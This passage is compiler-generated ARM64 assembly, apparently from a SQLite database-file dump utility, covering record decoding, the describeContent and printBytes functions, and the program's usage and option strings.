ldr w2, [sp, #204]
bl _printBytes
ldr w8, [sp, #120]
; implicit-def: $x10
mov x10, x8
ldr x8, [sp, #152]
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.120@PAGE
add x0, x0, l_.str.120@PAGEOFF
bl _printf
ldr x8, [sp, #152]
subs x8, x8, #0
str x8, [sp, #56] ; 8-byte Folded Spill
subs x8, x8, #11
cset w8, hi
tbnz w8, #0, LBB21_29
; %bb.17: ; in Loop: Header=BB21_13 Depth=1
ldr x11, [sp, #56] ; 8-byte Folded Reload
adrp x10, lJTI21_0@PAGE
add x10, x10, lJTI21_0@PAGEOFF
Ltmp6:
adr x8, Ltmp6
ldrsw x9, [x10, x11, lsl #2]
add x8, x8, x9
br x8
LBB21_18: ; in Loop: Header=BB21_13 Depth=1
adrp x8, l_.str.121@PAGE
add x8, x8, l_.str.121@PAGEOFF
str x8, [sp, #112]
str wzr, [sp, #108]
b LBB21_30
LBB21_19: ; in Loop: Header=BB21_13 Depth=1
adrp x8, l_.str.122@PAGE
add x8, x8, l_.str.122@PAGEOFF
str x8, [sp, #112]
mov w8, #1
str w8, [sp, #108]
b LBB21_30
LBB21_20: ; in Loop: Header=BB21_13 Depth=1
adrp x8, l_.str.123@PAGE
add x8, x8, l_.str.123@PAGEOFF
str x8, [sp, #112]
mov w8, #2
str w8, [sp, #108]
b LBB21_30
LBB21_21: ; in Loop: Header=BB21_13 Depth=1
adrp x8, l_.str.124@PAGE
add x8, x8, l_.str.124@PAGEOFF
str x8, [sp, #112]
mov w8, #3
str w8, [sp, #108]
b LBB21_30
LBB21_22: ; in Loop: Header=BB21_13 Depth=1
adrp x8, l_.str.125@PAGE
add x8, x8, l_.str.125@PAGEOFF
str x8, [sp, #112]
mov w8, #4
str w8, [sp, #108]
b LBB21_30
LBB21_23: ; in Loop: Header=BB21_13 Depth=1
adrp x8, l_.str.126@PAGE
add x8, x8, l_.str.126@PAGEOFF
str x8, [sp, #112]
mov w8, #6
str w8, [sp, #108]
b LBB21_30
LBB21_24: ; in Loop: Header=BB21_13 Depth=1
adrp x8, l_.str.127@PAGE
add x8, x8, l_.str.127@PAGEOFF
str x8, [sp, #112]
mov w8, #8
str w8, [sp, #108]
b LBB21_30
LBB21_25: ; in Loop: Header=BB21_13 Depth=1
adrp x8, l_.str.128@PAGE
add x8, x8, l_.str.128@PAGEOFF
str x8, [sp, #112]
mov w8, #8
str w8, [sp, #108]
b LBB21_30
LBB21_26: ; in Loop: Header=BB21_13 Depth=1
adrp x8, l_.str.129@PAGE
add x8, x8, l_.str.129@PAGEOFF
str x8, [sp, #112]
str wzr, [sp, #108]
b LBB21_30
LBB21_27: ; in Loop: Header=BB21_13 Depth=1
adrp x8, l_.str.130@PAGE
add x8, x8, l_.str.130@PAGEOFF
str x8, [sp, #112]
str wzr, [sp, #108]
b LBB21_30
LBB21_28: ; in Loop: Header=BB21_13 Depth=1
adrp x8, l_.str.131@PAGE
add x8, x8, l_.str.131@PAGEOFF
str x8, [sp, #112]
str wzr, [sp, #108]
b LBB21_30
LBB21_29: ; in Loop: Header=BB21_13 Depth=1
ldr x8, [sp, #152]
subs x8, x8, #12
; kill: def $w8 killed $w8 killed $x8
mov w9, #2
sdiv w8, w8, w9
str w8, [sp, #108]
ldr x8, [sp, #152]
ands x8, x8, #0x1
cset w8, eq
and w10, w8, #0x1
adrp x9, l_.str.133@PAGE
add x9, x9, l_.str.133@PAGEOFF
adrp x8, l_.str.132@PAGE
add x8, x8, l_.str.132@PAGEOFF
ands w10, w10, #0x1
csel x3, x8, x9, ne
ldr w9, [sp, #108]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
add x0, sp, #266
str x0, [sp, #48] ; 8-byte Folded Spill
mov w1, #0
mov x2, #30
bl ___sprintf_chk
ldr x8, [sp, #48] ; 8-byte Folded Reload
str x8, [sp, #112]
b LBB21_30
LBB21_30: ; in Loop: Header=BB21_13 Depth=1
ldr x8, [sp, #112]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.134@PAGE
add x0, x0, l_.str.134@PAGEOFF
bl _printf
ldr w8, [sp, #108]
ldrsw x10, [sp, #120]
add x9, sp, #3, lsl #12 ; =12288
add x9, x9, #4008
str w8, [x9, x10, lsl #2]
ldr x8, [sp, #184]
ldrsw x10, [sp, #120]
add x9, sp, #2, lsl #12 ; =8192
add x9, x9, #104
; kill: def $w8 killed $w8 killed $x8
str w8, [x9, x10, lsl #2]
ldr x8, [sp, #152]
ldrsw x10, [sp, #120]
add x9, sp, #296
; kill: def $w8 killed $w8 killed $x8
str w8, [x9, x10, lsl #2]
ldrsw x9, [sp, #108]
ldr x8, [sp, #184]
add x8, x8, x9
str x8, [sp, #184]
ldr w8, [sp, #120]
add w8, w8, #1
str w8, [sp, #120]
ldr w9, [sp, #204]
ldr w8, [sp, #200]
add w8, w8, w9
str w8, [sp, #200]
b LBB21_13
LBB21_31:
str wzr, [sp, #204]
b LBB21_32
LBB21_32: ; =>This Loop Header: Depth=1
; Child Loop BB21_55 Depth 2
; Child Loop BB21_48 Depth 2
; Child Loop BB21_39 Depth 2
ldr w8, [sp, #204]
ldr w9, [sp, #120]
subs w8, w8, w9
cset w8, ge
mov w9, #0
str w9, [sp, #44] ; 4-byte Folded Spill
tbnz w8, #0, LBB21_34
b LBB21_33
LBB21_33: ; in Loop: Header=BB21_32 Depth=1
ldrsw x9, [sp, #204]
add x8, sp, #2, lsl #12 ; =8192
add x8, x8, #104
ldr w8, [x8, x9, lsl #2]
ldrsw x10, [sp, #204]
add x9, sp, #3, lsl #12 ; =12288
add x9, x9, #4008
ldr w9, [x9, x10, lsl #2]
add w9, w8, w9
; implicit-def: $x8
mov x8, x9
sxtw x8, w8
ldr x9, [sp, #144]
subs x8, x8, x9
cset w8, le
str w8, [sp, #44] ; 4-byte Folded Spill
b LBB21_34
LBB21_34: ; in Loop: Header=BB21_32 Depth=1
ldr w8, [sp, #44] ; 4-byte Folded Reload
tbz w8, #0, LBB21_70
b LBB21_35
LBB21_35: ; in Loop: Header=BB21_32 Depth=1
ldrsw x9, [sp, #204]
add x8, sp, #2, lsl #12 ; =8192
add x8, x8, #104
ldr w8, [x8, x9, lsl #2]
str w8, [sp, #104]
ldrsw x9, [sp, #204]
add x8, sp, #3, lsl #12 ; =12288
add x8, x8, #4008
ldr w8, [x8, x9, lsl #2]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB21_37
b LBB21_36
LBB21_36: ; in Loop: Header=BB21_32 Depth=1
b LBB21_69
LBB21_37: ; in Loop: Header=BB21_32 Depth=1
ldr x0, [sp, #224]
ldr x8, [sp, #136]
ldrsw x9, [sp, #104]
add x1, x8, x9
ldrsw x9, [sp, #204]
add x8, sp, #3, lsl #12 ; =12288
add x8, x8, #4008
ldr w2, [x8, x9, lsl #2]
bl _printBytes
ldr w9, [sp, #204]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.135@PAGE
add x0, x0, l_.str.135@PAGEOFF
bl _printf
ldr x8, [sp, #136]
ldrsw x9, [sp, #104]
add x8, x8, x9
str x8, [sp, #88]
ldrsw x9, [sp, #204]
add x8, sp, #296
ldr w8, [x8, x9, lsl #2]
subs w8, w8, #7
cset w8, gt
tbnz w8, #0, LBB21_46
b LBB21_38
LBB21_38: ; in Loop: Header=BB21_32 Depth=1
ldr x8, [sp, #88]
ldrsb x8, [x8]
str x8, [sp, #96]
mov x8, #1
str x8, [sp, #184]
b LBB21_39
LBB21_39: ; Parent Loop BB21_32 Depth=1
; => This Inner Loop Header: Depth=2
ldr x8, [sp, #184]
ldrsw x10, [sp, #204]
add x9, sp, #3, lsl #12 ; =12288
add x9, x9, #4008
ldrsw x9, [x9, x10, lsl #2]
subs x8, x8, x9
cset w8, ge
tbnz w8, #0, LBB21_42
b LBB21_40
LBB21_40: ; in Loop: Header=BB21_39 Depth=2
ldr x9, [sp, #96]
ldr x8, [sp, #88]
ldr x10, [sp, #184]
ldrb w8, [x8, x10]
; kill: def $x8 killed $w8
add x8, x8, x9, lsl #8
str x8, [sp, #96]
b LBB21_41
LBB21_41: ; in Loop: Header=BB21_39 Depth=2
ldr x8, [sp, #184]
add x8, x8, #1
str x8, [sp, #184]
b LBB21_39
LBB21_42: ; in Loop: Header=BB21_32 Depth=1
ldrsw x9, [sp, #204]
add x8, sp, #296
ldr w8, [x8, x9, lsl #2]
subs w8, w8, #7
cset w8, ne
tbnz w8, #0, LBB21_44
b LBB21_43
LBB21_43: ; in Loop: Header=BB21_32 Depth=1
ldr x8, [sp, #96]
str x8, [sp, #80]
ldr d0, [sp, #80]
mov x8, sp
str d0, [x8]
adrp x0, l_.str.136@PAGE
add x0, x0, l_.str.136@PAGEOFF
bl _printf
b LBB21_45
LBB21_44: ; in Loop: Header=BB21_32 Depth=1
ldr x8, [sp, #96]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.137@PAGE
add x0, x0, l_.str.137@PAGEOFF
bl _printf
b LBB21_45
LBB21_45: ; in Loop: Header=BB21_32 Depth=1
b LBB21_68
LBB21_46: ; in Loop: Header=BB21_32 Depth=1
ldrsw x9, [sp, #204]
add x8, sp, #296
ldr w8, [x8, x9, lsl #2]
ands w8, w8, #0x1
cset w8, ne
tbnz w8, #0, LBB21_54
b LBB21_47
LBB21_47: ; in Loop: Header=BB21_32 Depth=1
mov w8, #120
strb w8, [sp, #234]
mov w8, #39
strb w8, [sp, #235]
mov w8, #2
str w8, [sp, #76]
str wzr, [sp, #72]
b LBB21_48
LBB21_48: ; Parent Loop BB21_32 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #72]
ldrsw x10, [sp, #204]
add x9, sp, #3, lsl #12 ; =12288
add x9, x9, #4008
ldr w9, [x9, x10, lsl #2]
subs w8, w8, w9
cset w8, ge
mov w9, #0
str w9, [sp, #40] ; 4-byte Folded Spill
tbnz w8, #0, LBB21_50
b LBB21_49
LBB21_49: ; in Loop: Header=BB21_48 Depth=2
ldr w8, [sp, #76]
subs w8, w8, #24
cset w8, lt
str w8, [sp, #40] ; 4-byte Folded Spill
b LBB21_50
LBB21_50: ; in Loop: Header=BB21_48 Depth=2
ldr w8, [sp, #40] ; 4-byte Folded Reload
tbz w8, #0, LBB21_53
b LBB21_51
LBB21_51: ; in Loop: Header=BB21_48 Depth=2
ldrsw x9, [sp, #76]
add x8, sp, #234
add x0, x8, x9
ldr x8, [sp, #88]
ldrsw x9, [sp, #72]
ldrb w10, [x8, x9]
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
mov w1, #0
mov x2, #-1
adrp x3, l_.str.138@PAGE
add x3, x3, l_.str.138@PAGEOFF
bl ___sprintf_chk
b LBB21_52
LBB21_52: ; in Loop: Header=BB21_48 Depth=2
ldr w8, [sp, #72]
add w8, w8, #1
str w8, [sp, #72]
ldr w8, [sp, #76]
add w8, w8, #2
str w8, [sp, #76]
b LBB21_48
LBB21_53: ; in Loop: Header=BB21_32 Depth=1
b LBB21_64
LBB21_54: ; in Loop: Header=BB21_32 Depth=1
mov w8, #39
strb w8, [sp, #234]
mov w8, #1
str w8, [sp, #76]
str wzr, [sp, #72]
b LBB21_55
LBB21_55: ; Parent Loop BB21_32 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #72]
ldrsw x10, [sp, #204]
add x9, sp, #3, lsl #12 ; =12288
add x9, x9, #4008
ldr w9, [x9, x10, lsl #2]
subs w8, w8, w9
cset w8, ge
mov w9, #0
str w9, [sp, #36] ; 4-byte Folded Spill
tbnz w8, #0, LBB21_57
b LBB21_56
LBB21_56: ; in Loop: Header=BB21_55 Depth=2
ldr w8, [sp, #76]
subs w8, w8, #24
cset w8, lt
str w8, [sp, #36] ; 4-byte Folded Spill
b LBB21_57
LBB21_57: ; in Loop: Header=BB21_55 Depth=2
ldr w8, [sp, #36] ; 4-byte Folded Reload
tbz w8, #0, LBB21_63
b LBB21_58
LBB21_58: ; in Loop: Header=BB21_55 Depth=2
ldr x8, [sp, #88]
ldrsw x9, [sp, #72]
ldrb w0, [x8, x9]
bl _isprint
subs w8, w0, #0
cset w8, eq
tbnz w8, #0, LBB21_60
b LBB21_59
LBB21_59: ; in Loop: Header=BB21_55 Depth=2
ldr x8, [sp, #88]
ldrsw x9, [sp, #72]
ldrb w8, [x8, x9]
str w8, [sp, #32] ; 4-byte Folded Spill
b LBB21_61
LBB21_60: ; in Loop: Header=BB21_55 Depth=2
mov w8, #46
str w8, [sp, #32] ; 4-byte Folded Spill
b LBB21_61
LBB21_61: ; in Loop: Header=BB21_55 Depth=2
ldr w8, [sp, #32] ; 4-byte Folded Reload
ldrsw x10, [sp, #76]
add x9, sp, #234
strb w8, [x9, x10]
b LBB21_62
LBB21_62: ; in Loop: Header=BB21_55 Depth=2
ldr w8, [sp, #72]
add w8, w8, #1
str w8, [sp, #72]
ldr w8, [sp, #76]
add w8, w8, #1
str w8, [sp, #76]
b LBB21_55
LBB21_63: ; in Loop: Header=BB21_32 Depth=1
ldrsw x9, [sp, #76]
add x8, sp, #234
add x8, x8, x9
strb wzr, [x8]
b LBB21_64
LBB21_64: ; in Loop: Header=BB21_32 Depth=1
ldr w8, [sp, #72]
ldrsw x10, [sp, #204]
add x9, sp, #3, lsl #12 ; =12288
add x9, x9, #4008
ldr w9, [x9, x10, lsl #2]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB21_66
b LBB21_65
LBB21_65: ; in Loop: Header=BB21_32 Depth=1
ldrsw x9, [sp, #76]
add x8, sp, #234
add x0, x8, x9
adrp x1, l_.str.139@PAGE
add x1, x1, l_.str.139@PAGEOFF
mov x2, #5
mov x3, #-1
bl ___memcpy_chk
b LBB21_67
LBB21_66: ; in Loop: Header=BB21_32 Depth=1
ldrsw x9, [sp, #76]
add x8, sp, #234
add x0, x8, x9
adrp x1, l_.str.140@PAGE
add x1, x1, l_.str.140@PAGEOFF
mov x2, #2
mov x3, #-1
bl ___memcpy_chk
b LBB21_67
LBB21_67: ; in Loop: Header=BB21_32 Depth=1
mov x9, sp
add x8, sp, #234
str x8, [x9]
adrp x0, l_.str.134@PAGE
add x0, x0, l_.str.134@PAGEOFF
bl _printf
b LBB21_68
LBB21_68: ; in Loop: Header=BB21_32 Depth=1
ldrsw x9, [sp, #204]
add x8, sp, #2, lsl #12 ; =8192
add x8, x8, #104
ldr w8, [x8, x9, lsl #2]
ldrsw x10, [sp, #204]
add x9, sp, #3, lsl #12 ; =12288
add x9, x9, #4008
ldr w9, [x9, x10, lsl #2]
add w8, w8, w9
str w8, [sp, #200]
b LBB21_69
LBB21_69: ; in Loop: Header=BB21_32 Depth=1
ldr w8, [sp, #204]
add w8, w8, #1
str w8, [sp, #204]
b LBB21_32
LBB21_70:
b LBB21_71
LBB21_71:
ldrsw x8, [sp, #200]
ldr x9, [sp, #144]
subs x8, x8, x9
cset w8, ge
tbnz w8, #0, LBB21_73
b LBB21_72
LBB21_72:
ldr x0, [sp, #224]
ldr x8, [sp, #136]
ldrsw x9, [sp, #200]
add x1, x8, x9
mov w2, #0
bl _printBytes
ldr x8, [sp, #144]
ldrsw x9, [sp, #200]
subs x8, x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.141@PAGE
add x0, x0, l_.str.141@PAGEOFF
bl _printf
b LBB21_73
LBB21_73:
ldr x8, [sp, #144]
ldr x9, [sp, #176]
subs x8, x8, x9
cset w8, ge
tbnz w8, #0, LBB21_75
b LBB21_74
LBB21_74:
ldr x0, [sp, #224]
ldr x8, [sp, #136]
ldr x9, [sp, #144]
add x1, x8, x9
mov w2, #4
bl _printBytes
ldr x8, [sp, #136]
ldr x9, [sp, #144]
add x0, x8, x9
bl _decodeInt32
mov x9, sp
; implicit-def: $x8
mov x8, x0
str x8, [x9]
adrp x0, l_.str.142@PAGE
add x0, x0, l_.str.142@PAGEOFF
bl _printf
b LBB21_75
LBB21_75:
ldur x9, [x29, #-24]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB21_77
b LBB21_76
LBB21_76:
bl ___stack_chk_fail
LBB21_77:
add sp, sp, #5, lsl #12 ; =20480
add sp, sp, #3824
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
ldp x28, x27, [sp], #32 ; 16-byte Folded Reload
ret
.cfi_endproc
.p2align 2
lJTI21_0:
.long LBB21_18-Ltmp6
.long LBB21_19-Ltmp6
.long LBB21_20-Ltmp6
.long LBB21_21-Ltmp6
.long LBB21_22-Ltmp6
.long LBB21_23-Ltmp6
.long LBB21_24-Ltmp6
.long LBB21_25-Ltmp6
.long LBB21_26-Ltmp6
.long LBB21_27-Ltmp6
.long LBB21_28-Ltmp6
.long LBB21_28-Ltmp6
; -- End function
.p2align 2 ; -- Begin function describeContent
_describeContent: ; @describeContent
.cfi_startproc
; %bb.0:
sub sp, sp, #144
.cfi_def_cfa_offset 144
stp x29, x30, [sp, #128] ; 16-byte Folded Spill
add x29, sp, #128
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur x1, [x29, #-16]
stur x2, [x29, #-24]
stur xzr, [x29, #-32]
mov w8, #32
strb w8, [sp, #47]
ldur x8, [x29, #-8]
ldur x9, [x29, #-16]
add x8, x8, x9
str x8, [sp, #48]
ldur x0, [x29, #-8]
sub x1, x29, #56
bl _decodeVarint
stur w0, [x29, #-36]
ldur x8, [x29, #-8]
ldur x9, [x29, #-56]
add x8, x8, x9
str x8, [sp, #56]
ldursw x9, [x29, #-36]
ldur x8, [x29, #-8]
add x8, x8, x9
stur x8, [x29, #-8]
ldur x8, [x29, #-56]
ldursw x9, [x29, #-36]
subs x8, x8, x9
stur x8, [x29, #-48]
b LBB22_1
LBB22_1: ; =>This Inner Loop Header: Depth=1
ldur x8, [x29, #-48]
subs x8, x8, #0
cset w8, le
mov w9, #0
str w9, [sp, #28] ; 4-byte Folded Spill
tbnz w8, #0, LBB22_3
b LBB22_2
LBB22_2: ; in Loop: Header=BB22_1 Depth=1
ldr x8, [sp, #56]
ldr x9, [sp, #48]
subs x8, x8, x9
cset w8, ls
str w8, [sp, #28] ; 4-byte Folded Spill
b LBB22_3
LBB22_3: ; in Loop: Header=BB22_1 Depth=1
ldr w8, [sp, #28] ; 4-byte Folded Reload
tbz w8, #0, LBB22_33
b LBB22_4
LBB22_4: ; in Loop: Header=BB22_1 Depth=1
ldur x0, [x29, #-8]
sub x1, x29, #56
bl _decodeVarint
stur w0, [x29, #-36]
ldursw x9, [x29, #-36]
ldur x8, [x29, #-8]
add x8, x8, x9
stur x8, [x29, #-8]
ldursw x9, [x29, #-36]
ldur x8, [x29, #-48]
subs x8, x8, x9
stur x8, [x29, #-48]
ldursw x9, [x29, #-36]
ldur x8, [x29, #-16]
subs x8, x8, x9
stur x8, [x29, #-16]
ldrb w8, [sp, #47]
ldur x9, [x29, #-24]
strb w8, [x9]
mov w8, #44
strb w8, [sp, #47]
ldur x8, [x29, #-32]
add x8, x8, #1
stur x8, [x29, #-32]
ldur x8, [x29, #-24]
add x8, x8, #1
stur x8, [x29, #-24]
ldur x8, [x29, #-56]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB22_6
b LBB22_5
LBB22_5: ; in Loop: Header=BB22_1 Depth=1
ldur x0, [x29, #-24]
mov w1, #0
mov x2, #-1
adrp x3, l_.str.107@PAGE
add x3, x3, l_.str.107@PAGEOFF
bl ___sprintf_chk
b LBB22_32
LBB22_6: ; in Loop: Header=BB22_1 Depth=1
ldur x8, [x29, #-56]
subs x8, x8, #1
cset w8, lt
tbnz w8, #0, LBB22_16
b LBB22_7
LBB22_7: ; in Loop: Header=BB22_1 Depth=1
ldur x8, [x29, #-56]
subs x8, x8, #6
cset w8, gt
tbnz w8, #0, LBB22_16
b LBB22_8
LBB22_8: ; in Loop: Header=BB22_1 Depth=1
ldr x8, [sp, #56]
ldrsb x8, [x8]
str x8, [sp, #64]
ldr x8, [sp, #56]
add x8, x8, #1
str x8, [sp, #56]
ldur x8, [x29, #-56]
subs x8, x8, #2
str x8, [sp, #16] ; 8-byte Folded Spill
subs x8, x8, #4
cset w8, hi
tbnz w8, #0, LBB22_15
; %bb.9: ; in Loop: Header=BB22_1 Depth=1
ldr x11, [sp, #16] ; 8-byte Folded Reload
adrp x10, lJTI22_0@PAGE
add x10, x10, lJTI22_0@PAGEOFF
Ltmp7:
adr x8, Ltmp7
ldrsw x9, [x10, x11, lsl #2]
add x8, x8, x9
br x8
LBB22_10: ; in Loop: Header=BB22_1 Depth=1
ldr x8, [sp, #64]
lsl x8, x8, #16
ldr x9, [sp, #56]
ldrb w9, [x9]
lsl w9, w9, #8
add x8, x8, w9, sxtw
ldr x9, [sp, #56]
ldrb w9, [x9, #1]
; kill: def $x9 killed $w9
add x8, x8, x9
str x8, [sp, #64]
ldr x8, [sp, #56]
add x8, x8, #2
str x8, [sp, #56]
b LBB22_11
LBB22_11: ; in Loop: Header=BB22_1 Depth=1
ldr x8, [sp, #64]
lsl x8, x8, #16
ldr x9, [sp, #56]
ldrb w9, [x9]
lsl w9, w9, #8
add x8, x8, w9, sxtw
ldr x9, [sp, #56]
ldrb w9, [x9, #1]
; kill: def $x9 killed $w9
add x8, x8, x9
str x8, [sp, #64]
ldr x8, [sp, #56]
add x8, x8, #2
str x8, [sp, #56]
b LBB22_12
LBB22_12: ; in Loop: Header=BB22_1 Depth=1
ldr x9, [sp, #64]
ldr x8, [sp, #56]
ldrb w8, [x8]
; kill: def $x8 killed $w8
add x8, x8, x9, lsl #8
str x8, [sp, #64]
ldr x8, [sp, #56]
add x8, x8, #1
str x8, [sp, #56]
b LBB22_13
LBB22_13: ; in Loop: Header=BB22_1 Depth=1
ldr x9, [sp, #64]
ldr x8, [sp, #56]
ldrb w8, [x8]
; kill: def $x8 killed $w8
add x8, x8, x9, lsl #8
str x8, [sp, #64]
ldr x8, [sp, #56]
add x8, x8, #1
str x8, [sp, #56]
b LBB22_14
LBB22_14: ; in Loop: Header=BB22_1 Depth=1
ldr x9, [sp, #64]
ldr x8, [sp, #56]
ldrb w8, [x8]
; kill: def $x8 killed $w8
add x8, x8, x9, lsl #8
str x8, [sp, #64]
ldr x8, [sp, #56]
add x8, x8, #1
str x8, [sp, #56]
b LBB22_15
LBB22_15: ; in Loop: Header=BB22_1 Depth=1
ldur x0, [x29, #-24]
ldr x8, [sp, #64]
mov x9, sp
str x8, [x9]
mov w1, #0
mov x2, #-1
adrp x3, l_.str.108@PAGE
add x3, x3, l_.str.108@PAGEOFF
bl ___sprintf_chk
b LBB22_31
LBB22_16: ; in Loop: Header=BB22_1 Depth=1
ldur x8, [x29, #-56]
subs x8, x8, #7
cset w8, ne
tbnz w8, #0, LBB22_18
b LBB22_17
LBB22_17: ; in Loop: Header=BB22_1 Depth=1
ldur x0, [x29, #-24]
mov w1, #0
mov x2, #-1
adrp x3, l_.str.109@PAGE
add x3, x3, l_.str.109@PAGEOFF
bl ___sprintf_chk
ldr x8, [sp, #56]
add x8, x8, #8
str x8, [sp, #56]
b LBB22_30
LBB22_18: ; in Loop: Header=BB22_1 Depth=1
ldur x8, [x29, #-56]
subs x8, x8, #8
cset w8, ne
tbnz w8, #0, LBB22_20
b LBB22_19
LBB22_19: ; in Loop: Header=BB22_1 Depth=1
ldur x0, [x29, #-24]
mov w1, #0
mov x2, #-1
adrp x3, l_.str.110@PAGE
add x3, x3, l_.str.110@PAGEOFF
bl ___sprintf_chk
b LBB22_29
LBB22_20: ; in Loop: Header=BB22_1 Depth=1
ldur x8, [x29, #-56]
subs x8, x8, #9
cset w8, ne
tbnz w8, #0, LBB22_22
b LBB22_21
LBB22_21: ; in Loop: Header=BB22_1 Depth=1
ldur x0, [x29, #-24]
mov w1, #0
mov x2, #-1
adrp x3, l_.str.111@PAGE
add x3, x3, l_.str.111@PAGEOFF
bl ___sprintf_chk
b LBB22_28
LBB22_22: ; in Loop: Header=BB22_1 Depth=1
ldur x8, [x29, #-56]
subs x8, x8, #12
cset w8, lt
tbnz w8, #0, LBB22_27
b LBB22_23
LBB22_23: ; in Loop: Header=BB22_1 Depth=1
ldur x8, [x29, #-56]
subs x8, x8, #12
mov x9, #2
sdiv x8, x8, x9
str x8, [sp, #32]
ldur x8, [x29, #-56]
ands x8, x8, #0x1
cset w8, ne
tbnz w8, #0, LBB22_25
b LBB22_24
LBB22_24: ; in Loop: Header=BB22_1 Depth=1
ldur x0, [x29, #-24]
ldr x8, [sp, #32]
mov x9, sp
str x8, [x9]
mov w1, #0
mov x2, #-1
adrp x3, l_.str.112@PAGE
add x3, x3, l_.str.112@PAGEOFF
bl ___sprintf_chk
b LBB22_26
LBB22_25: ; in Loop: Header=BB22_1 Depth=1
ldur x0, [x29, #-24]
ldr x8, [sp, #32]
mov x9, sp
str x8, [x9]
mov w1, #0
mov x2, #-1
adrp x3, l_.str.113@PAGE
add x3, x3, l_.str.113@PAGEOFF
bl ___sprintf_chk
b LBB22_26
LBB22_26: ; in Loop: Header=BB22_1 Depth=1
ldr x9, [sp, #32]
ldr x8, [sp, #56]
add x8, x8, x9
str x8, [sp, #56]
b LBB22_27
LBB22_27: ; in Loop: Header=BB22_1 Depth=1
b LBB22_28
LBB22_28: ; in Loop: Header=BB22_1 Depth=1
b LBB22_29
LBB22_29: ; in Loop: Header=BB22_1 Depth=1
b LBB22_30
LBB22_30: ; in Loop: Header=BB22_1 Depth=1
b LBB22_31
LBB22_31: ; in Loop: Header=BB22_1 Depth=1
b LBB22_32
LBB22_32: ; in Loop: Header=BB22_1 Depth=1
ldur x0, [x29, #-24]
bl _strlen
mov x8, x0
stur w8, [x29, #-40]
ldursw x9, [x29, #-40]
ldur x8, [x29, #-24]
add x8, x8, x9
stur x8, [x29, #-24]
ldursw x9, [x29, #-40]
ldur x8, [x29, #-32]
add x8, x8, x9
stur x8, [x29, #-32]
b LBB22_1
LBB22_33:
ldur x0, [x29, #-32]
ldp x29, x30, [sp, #128] ; 16-byte Folded Reload
add sp, sp, #144
ret
.cfi_endproc
.p2align 2
lJTI22_0:
.long LBB22_14-Ltmp7
.long LBB22_13-Ltmp7
.long LBB22_12-Ltmp7
.long LBB22_11-Ltmp7
.long LBB22_10-Ltmp7
; -- End function
.p2align 2 ; -- Begin function printBytes
_printBytes: ; @printBytes
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
str x1, [sp, #16]
str w2, [sp, #12]
ldr x8, [sp, #16]
ldur x9, [x29, #-8]
subs x8, x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.13@PAGE
add x0, x0, l_.str.13@PAGEOFF
bl _printf
str wzr, [sp, #8]
b LBB23_1
LBB23_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #8]
subs w8, w8, #9
cset w8, ge
tbnz w8, #0, LBB23_7
b LBB23_2
LBB23_2: ; in Loop: Header=BB23_1 Depth=1
ldr w8, [sp, #8]
ldr w9, [sp, #12]
subs w8, w8, w9
cset w8, lt
tbnz w8, #0, LBB23_4
b LBB23_3
LBB23_3: ; in Loop: Header=BB23_1 Depth=1
adrp x0, l_.str.18@PAGE
add x0, x0, l_.str.18@PAGEOFF
bl _printf
b LBB23_5
LBB23_4: ; in Loop: Header=BB23_1 Depth=1
ldr x8, [sp, #16]
ldrsw x9, [sp, #8]
ldrb w10, [x8, x9]
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x0, l_.str.19@PAGE
add x0, x0, l_.str.19@PAGEOFF
bl _printf
b LBB23_5
LBB23_5: ; in Loop: Header=BB23_1 Depth=1
b LBB23_6
LBB23_6: ; in Loop: Header=BB23_1 Depth=1
ldr w8, [sp, #8]
add w8, w8, #1
str w8, [sp, #8]
b LBB23_1
LBB23_7:
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.section __DATA,__data
.p2align 2 ; @db
_db:
.long 4294967295 ; 0xffffffff
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%s: can't open %s\n"
.section __DATA,__data
.p2align 2 ; @pagesize
_pagesize:
.long 1024 ; 0x400
.section __TEXT,__cstring,cstring_literals
l_.str.1: ; @.str.1
.asciz "Pagesize: %d\n"
.zerofill __DATA,__bss,_mxPage,4,2 ; @mxPage
l_.str.2: ; @.str.2
.asciz "Available pages: 1..%d\n"
l_.str.3: ; @.str.3
.asciz "dbheader"
l_.str.4: ; @.str.4
.asciz "pgidx"
l_.str.5: ; @.str.5
.asciz "ptrmap"
l_.str.6: ; @.str.6
.asciz "help"
l_.str.7: ; @.str.7
.asciz "%s: unknown option: [%s]\n"
l_.str.8: ; @.str.8
.asciz "..end"
l_.str.9: ; @.str.9
.asciz "Page argument should be LOWER?..UPPER?. Range 1 to %d\n"
l_.str.10: ; @.str.10
.asciz "Usage %s FILENAME ?args...?\n\n"
l_.str.11: ; @.str.11
